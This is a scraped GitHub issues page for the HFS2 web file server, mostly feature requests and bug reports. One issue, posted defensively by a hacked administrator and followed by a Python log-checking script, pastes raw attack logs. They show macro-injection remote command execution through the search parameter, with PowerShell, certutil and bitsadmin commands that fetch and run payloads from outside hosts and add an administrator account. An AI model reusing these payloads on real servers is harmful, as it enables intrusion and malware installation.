rejetto / hfs2
web based file server
Home Page: https://rejetto.com/hfs
License: GNU General Public License v3.0
The condition "if sizeOfFile(MACROS_LOG_FILE) = 0 then" is checking if the log file is empty before appending the new record. This can lead to an additional read of the file to check the size, which can be inefficient for large files. An alternative would be to keep a separate counter or use a global variable to check if this is the first time a record is being added and then add the log header if so.
const
  // Characters that must be escaped in HTML and their entity codes.
  // The field is named Ch so it does not clash with the Char type.
  HtmlEncodeChars: array[0..4] of record
    Ch: Char;
    Code: string;
  end = (
    (Ch: '<'; Code: '&lt;'),
    (Ch: '>'; Code: '&gt;'),
    (Ch: '&'; Code: '&amp;'),
    (Ch: '"'; Code: '&quot;'),
    (Ch: ''''; Code: '&#39;')
  );

function htmlEncode(const s: string): string;
var
  i, j, k, n: Integer;
  code: string;
begin
  SetLength(Result, Length(s) * 6); // maximum possible size after conversion
  j := 1;
  for i := 1 to Length(s) do
  begin
    if s[i] < ' ' then // control characters
      code := '?'
    else
    begin
      code := s[i]; // default: copy the character unchanged
      for k := Low(HtmlEncodeChars) to High(HtmlEncodeChars) do
        if s[i] = HtmlEncodeChars[k].Ch then
        begin
          code := HtmlEncodeChars[k].Code;
          Break;
        end;
    end;
    // copy the character or its entity code into the output buffer
    n := Length(code);
    Move(code[1], Result[j], n * SizeOf(Char));
    Inc(j, n);
  end;
  SetLength(Result, j - 1); // trim the unused part of the buffer
end;
Create a constant called HtmlEncodeChars that contains a list of HTML characters and their HTML encoded equivalents.
I've defined an htmlEncode function that iterates through the characters in the input string, checks whether each character needs to be HTML-encoded, and then adds the encoded character to the result. This is done using the Move function to copy the corresponding HTML code into the result.
If the macrosLog method is called frequently over a short period of time, it can be useful to group multiple log entries into a single write to disk.
This can be done by adding a global variable that stores the last write time to disk and then checking that a sufficient amount of time has passed since the last disk write before writing the new log entry.
"open directly in browser" function duplicated in menu and "mime types..." window.
the contents of mime types also are missing common already known files.
maybe the menu one "open directly in browser" can be integrated into "mime types..." window
Line 5150 in 29f6bac
Would it be possible to add the hostname and current date in the TAR filename ?
Like example.com_20201010_home.folder.tar
Thanks,
want to try save vfs with 2.3m, because #20.
I found this line from 2.4RC7(which has newer theme) can't work with 2.3m. but the two versions just use the same symbols only, and the macros don't affect any <a> tag of this section.
Line 422 in 29f6bac
checked documents, but found nothing about [+folder] section means.
is there any quickfix for this issue? Thanks
on the web, hfs is using the file's modified time as the info of the file.
But maybe hfs can use the time added to hfs' VFS for better sorting both on web and local ui to important the new files.
Another thought:
And both VFS window and log window displays left-right horizontal texts.
And if the window is not enough for the text(filename or URL path), then the texts get truncated.
So the VFS window and log window and log box window can use a stacked layout for a better view.
Greetings,
At the moment I am facing a problem and I would like to understand if it is due to the possible absence of an index or cache.
I have 98gb of 23,000 files in 3250 folders, when I search, it also takes 3-5 minutes before I get results.
I think it could be due to a lack of indexes, is it possible to implement improvements from this point of view? Like some modification in the template to use.
Or is it a code-side thing of the program?
Or am I doing something wrong?
hfs2.4RC06
Specs:
DL380 G6 | x2 cpu Xeon l5630;
Windows Server 2019 x64 DC LTSC;
32GB DDR3 1033mhz;
Files on HDD sata2 active (sata3 supported);
OS on SSD "";
Thanks in advance
We can test this on Linux using the following command:
ab -n 20000 -c 20 http://1.coco56.top/%E5%A4%A7%E5%9E%8B%E8%BD%AF%E4%BB%B6/
Sometimes the service does not respond. After a lot of files are transferred, the web page and other requests are not accepted, and the software functions are displayed normally. At this time, the service needs to be restarted to continue running. Here is a timer with a 10-second interval; will it affect performance?
procedure TmainFrm.TimerTestTimer(Sender: TObject);
begin
  if(not srv.active) then
  begin
    // listener is down: log it, then restart on the configured port
    add2log('not active');
    if assigned(srv) then srv.stop();
    srv.port := port;
    srv.start(listenOn);
  end
  else
  begin
    // listener is up: only log the state
    add2log('active');
  end;
end;
My HFS file server (W10) has just been hacked: it's time to update, don't use old versions anymore!
Here is some information for administrators.
The hack looks like this one : rapid7/metasploit-framework#19240
(not https://www.exploit-db.com/exploits/49584 )
I noticed strange commands in HFS logs, that look like remote commands in Search box.
HFS Logs :
09/06/2024 11:20:44 146.70.200.117 44116 Connected
09/06/2024 11:20:44 146.70.200.117 44116 Requested GET /?n=
&cmd=ipconfig+/all&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESUTLT:{.?n.}{.^abc.}===={.?n.}
09/06/2024 18:14:17 164.90.160.59 59642 Requested GET /?n=
&cmd=nslookup+cpit4a9no3sf3j5nia3gjkq7s6mq4anoy.oast.online&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 08:06:56 165.227.68.140 60692 Connected
11/06/2024 08:06:56 165.227.68.140 60692 Requested GET /?n=
&cmd=cmd+/c+echo 505227774 > C:/Users/Public/Downloads/0&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}----------------------start{.^abc.}----------------------end{.?n.}
11/06/2024 08:06:58 165.227.68.140 60694 Connected
11/06/2024 08:07:11 165.227.68.140 60694 Requested GET /?n=
&cmd=cmd+/c+powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://dpp-s3-data.s3.amazonaws.com/tpPNDWqMh5ubw','C:/Users/Public/Downloads/1.exe')&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}----------------------start{.^abc.}----------------------end{.?n.}
11/06/2024 16:46:20 104.28.158.204 62279 Requested GET /?n=
&cmd=RR.exe&search=%xxx%url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 16:46:20 104.28.153.15 14204 Requested GET /?n=
&cmd=certutil+-urlcache+-split+-f+http://39.101.122.168:889/RR.exe&search=%xxx%url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 16:51:02 61.52.169.128 59799 Requested GET /?n=
&cmd=ipconfig&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 17:49:18 103.119.15.175 47684 Requested GET /?n=%0A&cmd=echo%20WanLiChangChengWanLiChang%26&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 17:49:18 103.119.15.175 47690 Requested GET /?n=%0A&cmd=powershell.exe%20-nop%20-w%20hidden%20-c%20%22IEX%28%28new-object%20net.webclient%29.downloadstring%28%27http%3A//85.209.133.45%3A7598/dong.exe%27%29%29%22%26&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 17:53:25 43.205.207.16 60144 Requested GET /?n=
&cmd=ipconfig+/all&search=%xxx%url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 17:55:36 103.119.15.175 52008 Requested GET /?n=%0A&cmd=echo%20WanLiChangChengWanLiChang%26&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 17:55:36 103.119.15.175 52010 Requested GET /?n=%0A&cmd=bitsadmin.exe%20/transfer%20%22DownloadFile%22%20http%3A//85.209.133.45%3A7598/dong.exe%20%22%25CD%25%5Cdong.exe%22%20%26%26%20dong.exe&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 18:28:56 103.119.15.175 56406 Requested GET /?n=%0A&cmd=echo%20WanLiChangChengWanLiChang%26&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 18:28:56 103.119.15.175 56414 Requested GET /?n=%0A&cmd=powershell.exe%20-nop%20-w%20hidden%20-c%20%22IEX%28%28new-object%20net.webclient%29.downloadstring%28%27http%3A//120.131.13.101%3A8080/index.php%27%29%29%22&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 20:37:49 103.119.15.175 47594 Requested GET /?n=%0A&cmd=echo%20WanLiChangChengWanLiChang%26&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 20:37:49 103.119.15.175 47606 Requested GET /?n=%0A&cmd=net%20localgroup%20Administrators%20wlccwlc%20/add&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 20:47:31 103.119.15.175 39702 Requested GET /?n=%0A&cmd=REG%20query%20HKLM%5CSYSTEM%5CCurrentControlSet%5CControl%5CTerminal%20Server%5CWinStations%5CRDP-Tcp%20/v%20PortNumber&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 20:57:17 103.119.15.175 34474 Connected
11/06/2024 20:57:17 103.119.15.175 34474 Requested GET /?n=%0A&cmd=echo%20WanLiChangChengWanLiChang%26&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
&cmd=powershell+Invoke-WebRequest+http://185.173.93.167:13306/Crash.exe+-OutFile+c:\users\public\Crash.exe&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 23:15:49 3.38.212.132 52953 Requested GET /?n=
&cmd=powershell+Invoke-WebRequest+http://185.173.93.167:13306/WindowsWatcher.key+-OutFile+c:\users\public\WindowsWatcher.key&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 23:16:04 3.38.212.132 52955 Requested GET /?n=
&cmd=powershell+Invoke-WebRequest+http://185.173.93.167:13306/Roboform.dll+-OutFile+c:\users\public\Roboform.dll&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
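For administrators who want to check their own logs for the pattern reported above, here is a small detector. It is an added example, not part of the original post or of HFS; it assumes the record layout shown in the log above, and the sample lines are constructed with documentation IP ranges.

```python
import re
from urllib.parse import unquote, unquote_plus

# Record layout as it appears in the log above (an assumption about the format):
# "DD/MM/YYYY HH:MM:SS <ip> <port> <event text>"
RECORD_START = re.compile(r"^(\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2}) (\S+) (\d+) (.*)$")
MACRO_OPEN = re.compile(r"\{\.")                    # any macro opener inside a URL
EXEC_MACRO = re.compile(r"\{\.\s*exec\s*\|", re.I)  # the exec macro seen above
CMD_PARAM = re.compile(r"[?&]cmd=([^&]*)")


def join_records(lines):
    """Rebuild records: a raw newline in n= splits one request over two lines,
    so a line without a leading timestamp continues the previous record."""
    records = []
    for line in lines:
        line = line.rstrip("\r\n")
        m = RECORD_START.match(line)
        if m:
            records.append(list(m.groups()))
        elif records and line:
            records[-1][3] += line
    return records


def find_macro_requests(lines):
    """Return one finding per request whose URL carries HFS macro syntax."""
    findings = []
    for ts, ip, _port, event in join_records(lines):
        if not event.startswith("Requested "):
            continue
        url = unquote(event)          # also catches %7B.exec style encodings
        if EXEC_MACRO.search(url):
            severity = "exec"
        elif MACRO_OPEN.search(url):
            severity = "macro"
        else:
            continue
        m = CMD_PARAM.search(event)   # match before decoding so %26 stays in cmd
        cmd = unquote_plus(m.group(1)) if m else None
        findings.append({"time": ts, "ip": ip, "severity": severity, "cmd": cmd})
    return findings


# Constructed sample (documentation IP ranges), shaped like the entries above.
SAMPLE_LOG = [
    "09/06/2024 11:20:44 192.0.2.10 44116 Connected",
    "09/06/2024 11:20:44 192.0.2.10 44116 Requested GET /?n=",
    "&cmd=ipconfig+/all&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}",
    "09/06/2024 11:21:02 198.51.100.7 50112 Requested GET /?n=%0A&cmd=ipconfig&search=x%7D%7B.exec|%7B.?cmd.}|out=abc.}",
    "09/06/2024 11:22:10 203.0.113.5 50200 Requested GET /docs/readme.txt",
    "09/06/2024 11:23:00 203.0.113.5 50201 Requested GET /?search={.?n.}",
]

if __name__ == "__main__":
    for f in find_macro_requests(SAMPLE_LOG):
        print(f["time"], f["ip"], f["severity"], repr(f["cmd"]))
```

Any "exec" finding means a command was submitted through the search box; whether it ran depends on the HFS version, so treat the host as suspect and review what the logged command would have done.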
Very simple, a user who doesn't have permission to download should also NOT view the contents of the folder in question. He actually gets a 401 error trying to access the folder. However, using the "deep Search" function he is able to find files and folders that were supposed to remain hidden.
This may be intentional (since it refers to a simple "disable downloading for the contents of this folder" instead of an actual "hide this folder and its contents and prevent viewing/downloading").
Anyway, thanks again 👍
A recent scan is triggering 16 different AV: https://www.virustotal.com/gui/file/42d14f9efe83cd9d695d0796232bd6e12d276c1262b6cf39d31cfcf64e128f11/detection
Can anything be done about this?
How to setup browsable to users only and file downloadable to everyone?
so if I use
domain.com/FOLDER - Only user can see who has access
domain.com/FOLDER/file.txt - can be seen and downloadable by everyone
IPv4 addresses are now exhausted. This has become one of the factors restricting the development of the Internet. The Chinese government and the ministry of industry and information technology are working hard on IPv6. So far, there are more than one billion IPv6 users in China. So there is an urgent need for applications that support IPv6.
As we all know, without a global network IP address, it is difficult for others to download the files we have shared. And in many cases, they can only access the files by connecting to the same router as us.
I tried to download some 10k pictures with 150 get requests at the same time, and then some pictures were not loaded in more than ten seconds. Is there any restriction on high concurrency?
If 1 or more items are selected, regardless of their type, using the "Archive" feature redirects to /~lib.js?mode=archive&recursive instead of generating a TAR archive and downloading it.
if the user window has a user says name:a pwd:b, then set / point's access to the user a, and choose one of many files in / to use set user/pass option to set name:c pwd:d.
then go to the web to access the file using a:b will get no permission, using c:d will get error username not found.
I checked the web did send the right request with POST. and the hfs UI logged the requests but without the form data. so guess may be an issue with the hfs server end.
ps. also found the delete(with rename) permission wouldn't work at all. What would delete and rename option of the web do? will it delete/rename files just in vfs? or actually on disk?
Current browsers don't allow Cross-Origin Resource Sharing (CORS).
That's painful during development when using hfs to provide data-files.
For this hfs needs to provide the header
Access-Control-Allow-Origin: *
Could this be implemented, please?
Details:
https://web.dev/cross-origin-resource-sharing/
https://stackoverflow.com/questions/10636611/how-does-access-control-allow-origin-header-work
I need to switch between different usernames, but there's no function to logout.
Would you please add this function?
i got some issues with 2.4 RC7:
1. hfs can't load the web page correctly (seems like css or template) (run with wine on raspberry pi)
but 2.3m runs well with no css or template issue.
2. i can't set my local ip with http://192.x.x.x in hfs application. it always uses http://localhost. seems like 192.x.x.x is gone in ip address menu by default. (run with wine on raspberry pi). but if i type 192.x.x.x:port manually in web browser it still works.
i'm not using external ip.
version: hfs 2.4RC7 (Don't know if 2.3m has this issue.)
the hfs usually has 1~2 folders, 100+ files.
the file size of the corrupted .vfs usually is about 300bytes.
and via a text editor, can see only the first few(usually <10) items in the .vfs file. all the others items are lost.
guess:
the filenames usually contain special characters, or chinese, or japanese. like ( ) [ ] { } ` & ~ @ _ .
the hfs has run > a few hours.
Dear author. Thank you for bringing such a convenient web file sharing server to the Internet. But now there is a big problem in the server, that is, the global public network IPv4 has been exhausted. At present, most broadband service providers always use nat-ipv4 to enable multiple users to share a public IPv4 address. Because dynamic DNS can only be realized on the basis that users directly hold a dynamic public network IPv4, individual users now cannot use dynamic DNS to share their files with the outside world.
However, the new version 6 network protocol has become more and more mature, which has perfectly solved the problem of depletion of IPv4 in the global public network. At this stage, most of the leading broadband service providers have access to IPv6 network and promised to assign no less than / 60 prefix to individual users. However, some backward small broadband service providers have not yet access to IPv6 network, Therefore, I suggest that you should support dual protocol stack as soon as possible, that is, both V4 and V6. It not only facilitates the use of individual users who do not have public network V4 but have public network V6, but also facilitates users with only V4 network access to access the sharing stations provided by their friends.
Hi,
I found a bug. When I use cloudflare proxy, user can't login, and when I turn it off, it works fine.
The error that I get is "bad password" even when I am using correct pass. I tried using it without proxy and it worked fine.
Thanks
Hello,
Please note that the file is uploaded twice even when a single post method is invoked (2.4.0 RC6).
00:49:15 127.0.0.1:50773 Connected
00:49:15 [email protected]:50773 Uploading EINVOICE-2021918922516830.PDF
00:49:15 [email protected]:50773 Fully uploaded EINVOICE-2021918922516830.PDF - 189.9 K @ 855.4 KB/s
00:49:15 [email protected]:50773 Disconnected by server - 52 bytes sent
00:49:15 127.0.0.1:50774 Connected
00:49:15 [email protected]:50774 Uploading EINVOICE-2021918922516830.PDF
00:49:16 [email protected]:50774 Fully uploaded EINVOICE-2021918922516830.PDF - 189.9 K @ 811.6 KB/s
00:49:16 [email protected]:50774 Requested POST /HFS/
00:49:16 [email protected]:50774 Request dump
> POST /HFS/ HTTP/1.1
> Connection: keep-alive
> Content-Type: multipart/form-data; boundary=--------101221004915412
> Content-Length: 194705
> Host: localhost
> User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0
> Authorization: Basic VXNlcm5hbWU6UGFzc3dvcmQ=
00:49:19 [email protected]:50774 Disconnected - 139 bytes sent
Best regards.
the Delphi Community Edition currently seems completely broken: when signing up, you get an email with a serial-code, and when trying to use that serial-code during installation, it will say
No valid license information found for Embarcadero Delphi 10.4. You must provide a valid serial number(blablabla)
and when trying to email [email protected]
about the issue, you get an error
550 5.1.1 The email account that you tried to reach does not exist. Please try double-checking the recipient's email address for typos or unnecessary spaces.
so yeah... seems Delphi Community Edition is not currently an option.. Anyone tried compiling it on Free Pascal?
Hey Rejetto,
I've been trying out HFS for the last couple days. It's been working great. Nice work!
I was curious if this 5 year old post about remote execution is still valid.
Thanks!
between and between! macros in alias.txt are broken. There are pairs of .} missing, which should be there to close {.and.
They should be:
between=if|{.$1 < $3.}|{:{.and|{.$1 <= $2.}|{.$2 <= $3.}.}:}|{:{.and|{.$3 <= $2.}|{.$2 <= $1.}.}:}
between!=if|{.$1 < $3.}|{:{.and|{.$1 < $2.}|{.$2 < $3.}.}:}|{:{.and|{.$3 < $2.}|{.$2 < $1.}.}:}
Fix it ;)
Hi there @rejetto, I have had HFS 2.3.x and 2.4.x running on two of my servers. Today I wanted to share some files, so I tried to open it from the tray bar, however, it seems that the .exe file is gone on both servers!
Is this something intentional (maybe you added it because of the recent RCE exploit)? Or is it something that I need to be concerned about, maybe the servers are infected? 😲
I would appreciate some clarification!
Hi,
I have used the custom ip option and added my domain then used cloudflare to show it but it is not working.
do you know why?
I have used port 12400
is it related to that?
Thanks
wanted to update the vfs file via python and other languages for convenience.
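I tried below with python.
import zlib

# a holds the raw bytes of the .vfs file ('example.vfs' is a placeholder path)
with open('example.vfs', 'rb') as f:
    a = f.read()
# try to inflate a zlib stream starting at each of the first 900 offsets
for offset in range(900):
    try:
        print(zlib.decompress(a[offset:] + b'\0'))
    except zlib.error:
        pass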
but failed to parse the compressed vfs file. It seems that the data after the header part within the .vfs file is not compressed by zlib.
is it able to add wiki for how the struct of vfs file works?
redirects to undefined (temporary fix: replace undefined with '')
ERROR:crash_report_database_win.cc(469)] failed to stat report
HFS.Libraries, Where can I download this library file? The forum downloads the old version.
I want to build it by myself.
I